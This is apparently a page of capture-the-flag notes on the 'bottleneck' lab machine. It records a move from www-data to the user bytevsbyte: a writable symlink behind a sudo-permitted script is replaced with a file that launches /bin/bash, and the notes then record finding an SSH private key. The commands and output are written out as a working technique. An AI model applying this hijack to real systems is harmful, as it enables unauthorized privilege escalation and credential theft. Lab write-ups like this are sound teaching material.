6 www-data > bytevsbyte

www-data@bottleneck:/tmp$ sudo -u bytevsbyte "/var/www/html/web_utils/clear_logs"

# tried making rm using msfvenom - didnt work

www-data@bottleneck:/tmp$ cat "/var/www/html/web_utils/clear_logs"
#!/bin/bash
rm -f /var/log/soc/intrusion_*
www-data@bottleneck:/tmp$ ls -la /opt
total 16
drwxr-xr-x  2 root       root       4096 Sep 27  2019 .
drwxr-xr-x 20 root       root       4096 Feb 20  2020 ..
-rwxr--r--  1 bytevsbyte bytevsbyte   43 Sep 27  2019 clear_logs.sh
-rw-r--r--  1 root       root        359 Sep 27  2019 ids_strong_bvb.py
# cannot write / modify here

www-data@bottleneck:/tmp$ ls -la /var/www/html/web_utils/
total 8
drwxrwxr-x 2 www-data www-data 4096 Mar  2  2020 .
drwxr-xr-x 7 root     root     4096 Sep 26  2019 ..
lrwxrwxrwx 1 root     root       18 Mar  2  2020 clear_logs -> /opt/clear_logs.sh
# can write and modify here - we can change the symlink

# method 1 - change symlink 
echo -e "/bin/bash\n/bin/bash" > kashz.sh
ln -fs kashz.sh /var/www/html/web_utils/clear_logs

# delete symlink & change clear_logs directly as we have full control over it
rm clear_logs
echo -e "/bin/bash\n/bin/bash" > clear_logs
chmod 777 clear_logs

sudo -u bytevsbyte "/var/www/html/web_utils/clear_logs"

bytevsbyte@bottleneck:~/html/web_utils$ whoami;id;hostname
bytevsbyte
uid=1000(bytevsbyte) gid=1000(bytevsbyte) groups=1000(bytevsbyte),4(adm),24(cdrom),30(dip),46(plugdev),1001(tester)
bottleneck
id_rsa found in /home/bytevsbyte/.ssh/

Previous7 privesc > root Next5 box enum PEAS
Last updated 4 years ago